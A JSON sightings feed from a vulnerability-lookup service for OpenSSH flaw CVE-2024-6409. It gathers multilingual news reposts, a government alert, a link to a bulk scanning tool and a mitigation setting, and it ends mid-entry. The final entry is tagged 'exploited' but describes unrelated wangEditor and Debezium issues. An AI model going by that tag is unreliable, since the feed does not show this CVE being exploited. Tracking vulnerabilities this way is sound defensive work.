{"vulnerability": "CVE-2024-6409", "sightings": [{"uuid": "6a544799-a6ec-4094-8fcb-eb24077304de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1321", "content": "", "creation_timestamp": "2024-07-02T04:00:00.000000Z"}, {"uuid": "aebf8e6a-70d9-44be-946f-b3de5adea1d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7946", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2024-6409, CVE-2006-5051, CVE-2008-4109, and 16 other CVEs.\nURL\uff1ahttps://github.com/bigb0x/SSH-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T12:00:31.000000Z"}, {"uuid": "140c7176-de78-4d9b-8e87-d0ca005e9360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/HackingInsights/5379", "content": "\u200aNew OpenSSH Vulnerability CVE-2024-6409 Exposes Systems to RCE Attack\n\nhttps://cybersecuritynews.com/new-openssh-vulnerability-cve-2024-6409/", "creation_timestamp": "2024-07-09T16:50:11.000000Z"}, {"uuid": "0f502186-f00a-4271-ab78-83673f5095dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "Telegram/ADmedM95kByDcCNpMf4Yprqz7t01FKYHlAAE1LdcmjJQFA", "content": "", "creation_timestamp": "2024-07-10T06:23:20.000000Z"}, {"uuid": "84cbf7fd-ed01-44cb-bbbd-c5bd26b27f53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/2863", "content": "The Hacker News\nNew OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T08:08:21.000000Z"}, {"uuid": "9e646d70-957d-4f5a-aa92-05cfc6f2241b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/KomunitiSiber/2227", "content": "New OpenSSH Vulnerability Discovered: Potential Remote Code Execution Risk\nhttps://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html\n\nSelect versions of the OpenSSH secure networking suite are susceptible to a new vulnerability that can trigger remote code execution (RCE).\nThe vulnerability, tracked as CVE-2024-6409 (CVSS score: 7.0), is distinct from CVE-2024-6387 (aka RegreSSHion) and relates to a case of code execution in the privsep child process due to a race condition in signal handling. It only impacts versions 8.7p1", "creation_timestamp": "2024-07-10T06:30:56.000000Z"}, {"uuid": "bdcfe9b7-9ebf-43c3-9220-1913a52b786e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/true_secator/5950", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T17:35:05.000000Z"}, {"uuid": "2d8f6c58-59b4-4198-943c-950ea1863c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/information_security_channel/52545", "content": "Microsoft Says Windows Not Impacted by regreSSHion as Second OpenSSH Bug Is Found\nhttps://www.securityweek.com/microsoft-says-windows-not-impacted-by-regresshion-as-second-openssh-bug-is-found/\n\nA second remote code execution vulnerability, tracked as CVE-2024-6409, was found in OpenSSH during an analysis of the regreSSHion flaw.\nThe post Microsoft Says Windows Not Impacted by regreSSHion as Second OpenSSH Bug Is Found (https://www.securityweek.com/microsoft-says-windows-not-impacted-by-regresshion-as-second-openssh-bug-is-found/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-07-15T14:08:56.000000Z"}, {"uuid": "981082d3-79e7-4f8e-b8ce-8297743b5ac8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "seen", "source": "https://t.me/anti_malware/17904", "content": "\u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043c\u043d\u043e\u0433\u043e \u0433\u043e\u0432\u043e\u0440\u044f\u0442 \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 OpenSSH, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 Microsoft \u0440\u0435\u0448\u0438\u043b\u0430 \u0443\u0442\u043e\u0447\u043d\u0438\u0442\u044c, \u0447\u0442\u043e Windows \u043d\u0435 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u0430 \u00abregreSSHion\u00bb \u0438 CVE-2024-6409.", "creation_timestamp": "2024-08-27T16:05:57.000000Z"}, {"uuid": "f6f956c9-df85-44a2-b44a-16db138981b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "published-proof-of-concept", "source": "https://t.me/ptescalator/240", "content": "\u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u043e \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e OpenSSH \u0432 2024 \u0433\u043e\u0434\u0443 \ud83d\udeaa\n\n\u0412\u0437\u0433\u043b\u044f\u043d\u0435\u043c \u043d\u0430 \u0442\u0430\u0439\u043c\u043b\u0430\u0439\u043d:\n\n\u2022 \u0412\u0435\u0441\u043d\u0430. \u0411\u044d\u043a\u0434\u043e\u0440 \u0432 xz-utils (CVE-2024-3094). \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0435\u0433\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0431\u044b\u043b\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 systemd, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 OpenSSH \u0435\u0441\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044c liblzma, \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0430\u044f \u0432 \u043d\u0435\u043c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438 \u0441\u0430\u043c\u0438\u043c OpenSSH \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f (\u0442\u043e \u0435\u0441\u0442\u044c \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0435\u0447\u044c \u043e\u0431 \u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u044d\u0442\u0438\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432, \u0430 \u043d\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u043d\u0430 OpenSSH).\n\n\u2022 \u0418\u044e\u043b\u044c. \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0434\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c \u043d\u0430 \u0431\u0430\u0437\u0435 glibc, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 regreSSHion (CVE-2024-6387) \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u043f\u0435\u0440\u0435\u0440\u043e\u0436\u0434\u0435\u043d\u043d\u0443\u044e CVE-2006-5051.\n\n\u2022 \u0412\u0441\u0435 \u0442\u043e\u0442 \u0436\u0435 \u0438\u044e\u043b\u044c. \u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u0441\u0445\u043e\u0436\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0430\u044f \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE-2024-6409.\n\n\u2022 \u0410\u0432\u0433\u0443\u0441\u0442. \u0415\u0449\u0435 \u043e\u0434\u043d\u0430, \u0443\u0436\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u0430\u044f \u0434\u043b\u044f FreeBSD, CVE-2024-7589.\n\n\u2754 \u0427\u0442\u043e \u044d\u0442\u043e \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u044b\u043b\u043e\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0443\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0439 \u0433\u043e\u043d\u043a\u0438\u00bb \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE \u043d\u0430 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, regreSSHion \u2014 \u0433\u043b\u0430\u0432\u043d\u044b\u0439 \u0431\u0430\u0433 (\u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 sshd) \u2014 \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 SSH-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 glibc. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043e\u0441\u043e\u0431\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 (\u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0430 \u0438 \u0434\u043b\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e). \u041d\u043e \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e PoC \u043d\u0435\u0442 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440.\n\n\u041c\u044b \u0440\u0435\u0448\u0438\u043b\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f, \u0442\u0430\u043a \u043b\u0438 \u043e\u043f\u0430\u0441\u043d\u044b \u044d\u0442\u0438 \u00ab\u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u0433\u043e\u043d\u043a\u0438\u00bb \u0438 \u043a\u0430\u043a\u0438\u0435 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b \u0432 sshd \u043f\u0440\u0438\u0437\u0432\u0430\u043d\u044b \u043d\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u043b\u0438 \u0445\u043e\u0442\u044f \u0431\u044b \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u0443\u0449\u0435\u0440\u0431 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438. \u041f\u043e\u043f\u0443\u0442\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u043b\u0438 \u043e\u0431\u0437\u043e\u0440 \u0438 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 OpenSSH \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0433\u043e \u0433\u043e\u0434\u0430.\n\n\ud83d\udd23 \u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u0432\u0441\u0435 \u044d\u0442\u043e \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0431\u0430\u0437\u043e\u0439 \u0438 \u044d\u043a\u0441\u043a\u0443\u0440\u0441\u043e\u043c \u043d\u0430 30 \u0441\u0435\u043a\u0443\u043d\u0434 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435 \u043d\u0430 \u0425\u0430\u0431\u0440\u0435. Enjoy!\n\n#CVE #escvr\n@ptescalator", "creation_timestamp": "2025-01-30T08:33:54.000000Z"}, {"uuid": "2ffdd8a6-7beb-4be3-8b32-99e34fb313f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6409", "type": "exploited", "source": "https://t.me/cyber_hsecurity/1608", "content": ":\n\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 wanEditor v4.7.11 \u0648\u062a\u0645 \u0625\u0635\u0644\u0627\u062d\u0647\u0627 \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631\u064a\u0646 v.4.7.12 \u0648v.5\u060c \u0648\u0647\u064a \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0646\u0635\u064a\u0629 \u0639\u0628\u0631 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 (XSS) \u0639\u0628\u0631 \u0648\u0638\u064a\u0641\u0629 \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u0635\u0648\u0631.\n\nhttps://gist.github.com/Mdxjj/5cf0a31e8abf24ed688ceb5b3543516d\n\n\u0647\u0646\u0627\u0643 \u0645\u0634\u0643\u0644\u0629 \u0641\u064a Debezium 